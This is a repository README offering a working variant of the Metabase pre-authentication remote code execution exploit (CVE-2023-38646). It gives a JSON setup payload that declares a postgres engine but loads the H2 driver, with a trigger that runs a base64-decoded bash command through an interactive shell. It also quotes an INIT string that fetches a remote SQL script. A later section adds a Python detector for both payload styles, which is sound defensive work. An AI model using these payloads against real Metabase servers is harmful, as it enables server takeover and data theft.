0utl4nder / Another-Metabase-RCE-CVE-2023-38646

Metabase postgres (org.h2.Driver) RCE without INIT

Extension of the pre-auth RCE in Metabase (CVE-2023-38646) explained in the reference below.

This helped me avoid errors related to "database already in use" (with H2 and Postgres as engines).

```json
{
  "token": "TOKEN",
  "details": {
    "is_on_demand": false,
    "is_full_sync": false,
    "is_sample": false,
    "cache_ttl": null,
    "refingerprint": false,
    "auto_run_queries": true,
    "schedules": {},
    "details": {
      "advanced-options": true,
      "classname": "org.h2.Driver",
      "subname": "./metabase.jar;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER xel BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {echo,BASE64COMMAND}|{base64,-d}|{bash,-i}')\n$$--=x",
      "subprotocol": "h2"
    },
    "engine": "postgres",
    "name": "x"
  }
}
```

Instead of using `h2` directly as the engine together with the INIT script (INIT is stripped from our queries), we keep using the H2 database query path: the engine is declared as `postgres`, while the advanced options point `classname` at `org.h2.Driver` with an `h2` subprotocol.

The original INIT-script connection string:

```
mem;test;INIT=RUNSCRIPT FROM 'http://10.10.10.10/sqlcmd.sql'
```

In that `.sql` file you specify how the shell commands are executed.
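Both payload styles (the INIT=RUNSCRIPT string and the inline CREATE TRIGGER smuggled under a `postgres` engine) can be flagged from the database-setup JSON body alone. The following detector is an added example, not code from this repository; the sample bodies are constructed, and the command content inside them is a placeholder:

```python
import json
import re

# Tokens in an H2 JDBC connection string that mean it is carrying code to execute
# rather than a path to a database (drawn from the two payload styles above).
H2_SUSPICIOUS = re.compile(
    r"(INIT\s*=|RUNSCRIPT\s+FROM|CREATE\s+TRIGGER|//javascript|java\.lang\.Runtime)",
    re.IGNORECASE,
)


def inspect_db_setup_body(body: str) -> list[str]:
    """Return findings for one database-setup JSON body; an empty list means clean."""
    try:
        doc = json.loads(body)
    except json.JSONDecodeError:
        return ["body is not valid JSON"]
    outer = doc.get("details") or {}
    inner = outer.get("details") or {}
    engine = outer.get("engine")
    findings = []
    # The bypass shown above: a non-h2 engine whose advanced options smuggle in the H2 driver.
    if engine != "h2" and (inner.get("classname") == "org.h2.Driver" or inner.get("subprotocol") == "h2"):
        findings.append(f"engine '{engine}' but org.h2.Driver/h2 subprotocol in advanced options")
    # Either style (INIT=RUNSCRIPT or an inline CREATE TRIGGER) lands in some string field.
    hits = set()
    for value in inner.values():
        if isinstance(value, str):
            hits.update(m.group(1).upper() for m in H2_SUSPICIOUS.finditer(value))
    findings.extend(f"dangerous H2 connection-string token: {h}" for h in sorted(hits))
    return findings


# Constructed sample bodies (not captured traffic); the exec() argument is a placeholder.
BENIGN = json.dumps({"token": "TOKEN", "details": {"engine": "postgres", "name": "app",
    "details": {"host": "db", "port": 5432, "dbname": "app"}}})
INIT_STYLE = json.dumps({"token": "TOKEN", "details": {"engine": "h2", "name": "x",
    "details": {"db": "mem;test;INIT=RUNSCRIPT FROM 'http://10.10.10.10/sqlcmd.sql'"}}})
TRIGGER_STYLE = json.dumps({"token": "TOKEN", "details": {"engine": "postgres", "name": "x",
    "details": {"advanced-options": True, "classname": "org.h2.Driver", "subprotocol": "h2",
                "subname": "./metabase.jar;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;"
                           "CREATE TRIGGER xel BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS "
                           "$$//javascript\njava.lang.Runtime.getRuntime().exec('PLACEHOLDER')\n$$--=x"}}})

if __name__ == "__main__":
    for name, body in (("benign", BENIGN), ("init", INIT_STYLE), ("trigger", TRIGGER_STYLE)):
        print(name, inspect_db_setup_body(body))
```

Scanning every string field of the inner `details` (not just `subname`) is what lets one check cover both the `db` field of the h2 engine and the advanced-options path of the postgres engine.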

REFERENCE

https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase

Written as a note; take it as vague documentation. You must have authorization to enumerate, exploit or simply test against any target.

Comments and contributions are welcome